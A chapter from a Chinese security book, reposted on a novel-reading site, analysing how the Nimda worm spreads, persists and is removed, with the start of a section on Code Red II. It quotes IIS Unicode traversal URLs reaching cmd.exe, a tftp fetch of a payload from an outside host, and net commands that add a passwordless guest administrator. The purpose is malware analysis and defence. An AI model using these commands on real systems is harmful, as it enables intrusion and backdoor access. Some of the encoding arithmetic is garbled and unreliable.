友情提示：如果本网页打开太慢或显示不完整，请尝试鼠标右键“刷新”本网页！阅读过程发现任何错误请告诉我们，谢谢！！报告错误

知者无畏--一个真实的簿世界-第章

按键盘上方向键 ← 或 → 可快速上下翻页，按键盘上的 Enter 键可回到本书目录页，按键盘上方向键 ↑ 可回到本页顶部！
————未阅读完？加入书签已便下次继续阅读！

临时文件夹中读取所有〃htm〃，〃html〃文件并从中提取电子邮件地址，　从信箱读取电子邮件地址并从中提取SMTP服务器，然后发送readme。eml，这可比仅仅通过outlook传播要厉害和隐蔽得多。　
（二）通过微软的unicode漏洞
在IIS　4。0和IIS　5。0在Unicode字符解码的实现中存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令。当IIS打开文件时，如果该文件名包含unicode字符，它会对其进行解码，如果用户提供一些特殊的编码，将导致IIS错误的打开或者执行某些web根目录以外的文件。
　　对于IIS　5。0/4。0中文版，当IIS收到的URL请求的文件名中包含一个特殊的编码例如〃％c1％hh〃或者〃％c0％hh〃；它会首先将其解码变成：0xc10xhh，　然后尝试打开这个文件，Windows　系统认为0xc10xhh可能是unicode编码，因此它会首先将其解码，如果　0x00　（0xc1　…　0xc0）　*　0x40　＋　0xhh
％c0％hh　…》　（0xc0　…　0xc0）　*　0x40　＋　0xhh
　　因此，利用这种编码，我们可以构造很多字符，例如：
％c1％1c　…》　（0xc1　…　0xc0）　*　0x40　＋　0x1c　=　0x5c　=　'/'
％c0％2f　…》　（0xc0　…　0xc0）　*　0x40　＋　0x2f　=　0x2f　=　''
攻击者可以利用这个漏洞来绕过IIS的路径检查，去执行或者打开任意的文件。　
如果系统包含某个可执行目录，就可能执行任意系统命令。下面的URL可能
列出当前目录的内容：
victim/scripts/。。％c1％1c。。/winnt/system32/cmd。exe？/c＋dir
利用这个漏洞查看系统文件内容也是可能的：
victim/a。asp/。。％c1％1c。。/。。％c1％1c。。/winnt/win。ini
（三）通过红色代码二代建立的root。exe　
红色代码二代会在IIS的几个可执行目录下放置root。exe　
也是尽人皆知，Nimda首先在udp/69上启动一个tftp服务器　
然后会作以下扫描　

一旦发现有弱点的系统就使用类似下面的命令　
GET　/scripts/root。exe？/c＋tftp　…i　xxx。xxx。xxx。xxx　GET　Admin。dll　HTTP/1。0　
把文件传到主机上去，然后再GET　/scripts/Admin。dll　HTTP/1。0　
（四）通过WWW服务　在所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件　所在目录中创建readme。eml，并在文件末加上下面这一行　window。open（〃readme。eml〃；　null；　〃resizable=no；top=6000；left=6000〃）　
也就是说如果一台web服务器被感染了，那么大部分访问过此服务器的机器都会被感染。　
（五）通过局域网　
Nimda会搜索本地的共享目录中包含doc文件的目录，一但找到，就会把自身复制到目录中命名为riched20。dll（原理见前）　
（六）以病毒的方式　
搜索＇SOFTWAREMicrosoftWindowsCurrentVersionApp　Paths＇寻找在远程主机上的可执行文件，　一旦找到，Nimda就会以病毒的方式感染文件。有一点不同的是，它把原文件作为资源存储在新文件中，　运行新文件时再当作可执行文件来调用。奇怪的是Nimda过滤了winzip32。exe，它不会感染winzip32。exe，　应该是作者发现winzip染毒后不能正常运行，就过滤掉这个使用最为广泛的压缩程序。　

如何运行的：　
病毒采取以下措施确保自己在系统一开机之后就运行：
1）把自己复制到windows系统文件夹里命名为riched20。dll（原理见前）　
2）把自己复制到windows系统文件夹里命名为load。exe，　
修改system。ini把　
shell=explorer。exe改为　
shell=explorer。exe　load。exe　…dontrunold　
使病毒在下次系统启动时运行。　

安全灾难—创建后门：　
1）　如果有足够权限将调用〃net。exe〃执行以下系统命令：　
net　user　guest　/add　增加一个guest用户
net　user　guest　/active 激活guest用户
net　user　guest　〃〃　 guest用户的密码为空
net　localgroup　Administrators　guest　将guest加到管理员组中！太可怕了。
net　localgroup　Guests　guest　/add　
结果是空密码的guest加到了Administrators组中。　

2）如果有足够权限将调用〃net。exe〃执行以下系统命令：　
net　share　c=c：　
删除＇SYSTEMCurrentControlSetServiceslanmanserverSharesSecurity＇的所有子键　
结果是C：设为完全共享。　

作者是谁？　
程序的作者在程序中留下了以下标记：　
fsdhqherwqi2001　
Concept　Virus（CV）　V。5；　Copyright（C）2001　R。P。China　
可能对最终找出作者有帮助。　
从这些信息来看，似乎作者来自中国，但是在作者没有站出来承认之前，这些文字可以使任何人加在病毒代码里的。

为什么说尼姆达是〃概念〃蠕虫？　
它可以通过至少六种方式传播　
它是一个带exe扩展名的dll，可以做为可执行文件运行，也可作为dll运行。　
它有智慧：当它名为Admin。dll被运行时，它会把自己复制到windows文件夹命名为mmc。exe并带上参数〃…qusery9bnow〃运行。　
当它名为readme。exe被运行时，它会把自己复制到％temp％带上参数〃…dontrunold〃运行。　
它会把自己的属性设为〃系统〃〃隐藏〃，再改写注册表，使〃系统〃〃隐藏〃属性的程序在资源管理器中不可见。　
它是一个主机扫描器，一个弱点扫描器，一个后门程序；带有多个漏洞，掌握最新的安全信息；它就是一个黑客，人们把它称为“瑞士军刀”不是没有道理的。　

如何清除尼姆达病毒？　
在文件夹选项里设置〃显示所有文件〃　
删除mmc。exe/load。exe/riched20。dll/admin。dll/readme。eml/readme。exe等所有蠕虫文件。　
从原始安装盘中提取riched20。dll覆盖windows系统文件夹里的同名蠕虫文件。　
检查所有大小为57344或79225的文件。　
可以使用〃查找〃工具，搜索包含〃fsdhqherwqi2001〃的*。exe/*。dll和包含〃Kz29vb29oWsrLPh4eisrPb09Pb2〃的*。eml/*。nws。　
检查system。ini，去掉自动执行load。exe文件的行。　
检查所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件。　
删除C：的共享　
重起系统　

如何避免Nimda入侵？

根本之道是打补丁：　
Unicode漏洞：microsoft/technet/security/bulletin/ms00…078。asp　
MIME漏洞：microsoft/technet/security/bulletin/ms01…020。asp　
IE5。01　SP2：microsoft/windows/ie/downloads/remended/ie501sp2/default。asp　
IE5。5　SP2：microsoft/windows/ie/downloads/remended/ie501sp2/default。asp　

其他解决方案：　
打开IE的〃工具》internet选项》安全》自定义级别》文件下载〃选〃禁用〃。　
删除所有不需要的默认虚拟目录，或者只给纯脚本执行权，最好不要把任何web目录放在系统分区。　
检查共享设置，Win9X的机器不要开完全共享，可以开只读共享，所有共享都要设置口令。　由于尼姆达可以利用红色代码二代创建的后门，所以需打上针对红色代码二代的补丁，
检查C：和D：　有没有explorer。exe，检查web目录中有没有root。exe。　
第二节　红色代码是红色的吗？
你知道吗，在“红色代码”流行之前，已经出现过“绿色代码”，而在“红色代码”之后，又出现了“蓝色代码”，这些五颜六色的东西的出现，仿佛宣告电脑病毒已经成为一种时尚，就像穿衣服有流行色一样，似乎病毒也有了自己的流行色。
实际上，从某种意义上，杀毒软件厂商对一种病毒进行分析之后，将其命名为“绿色代码”应该是引导这场时尚的先锋，因为这种命名，病毒作者故意在新的病毒里面包括了类似“Code　Red”之类的字符，让病毒的发现者命名它为“红色代码”，病毒和反病毒共同引导了这场颜色的革命。
红色代码有一代和二代两种，我们重点分析二代：
红色代码二代于2001年8月首次发现，它是“红色代码”病毒的一个变种。　
和“红色代码”一样，它也是利用缓冲区溢出传播到其他web服务器。由于收到了大量的因特网信息服务器（IIS　Server）被感染的报告。我们把“红色代码二代”定为高度危险。
最早的“红色代码”曾经成功的攻击了白宫的主页，导致其拒绝服务。更进一步，“红色代码二代”可以使黑客在远程取得对服�

返回目录上一页下一页回到顶部赞（0）踩（0）

未阅读完？加入书签已便下次继续阅读！

温馨提示：温看小说的同时发表评论，说出自己的看法和其它小伙伴们分享也不错哦！发表书评还可以获得积分和经验奖励，认真写原创书评被采纳为精评可以获得大量金币、积分和经验奖励哦！